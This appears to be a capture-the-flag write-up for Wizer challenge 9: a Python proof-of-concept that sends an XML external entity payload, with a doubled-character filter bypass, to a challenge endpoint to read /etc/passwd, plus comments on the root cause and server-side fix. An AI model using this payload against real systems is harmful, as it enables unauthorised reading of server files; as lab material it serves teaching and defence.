Wizer - Challenge 9 - XXE

Exploit

import requests

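# Proof-of-concept request against the Wizer challenge 9 card-creation API.
# The server-side code is not shown on this page; the notes below describe
# only what the request itself contains.
url = "https://chal9.vercel.app/api/createCard/"

# firstName ends with a quote/angle-bracket breakout followed by a comment
# opener; lastName closes that comment and supplies an external entity
# declaration whose SYSTEM identifier is file:///etc/passwd. Together they
# presumably rewrite the DTD the server assembles from these fields, so the
# rendered card echoes the file's contents (confirm against the challenge
# source).
# NOTE(review): the doubled "<<" and "!!" look intended to survive a
# single-pass strip of "<!" on the server; verify against the challenge code.
#
# Root cause / fix on the server side: user-supplied values are placed into
# XML markup without escaping, and the parser resolves external entities.
# Build the document with an XML serializer that escapes values, and disable
# DTD processing and external entity resolution in the parser; a blocklist
# filter on the input is not a substitute for either.
payload = {
    "firstName": "pelele\"><<!!--",
    "lastName": "pelele--><<!!ENTITY lastName SYSTEM \"file:///etc/passwd",
    "role": "pelele",
}

# requests has no default timeout; without one a stalled endpoint would hang
# the script indefinitely.
r = requests.post(url, json=payload, timeout=10)

# The response body is printed as-is; if the entity was resolved, the file
# contents appear in place of the lastName value.
print(r.text)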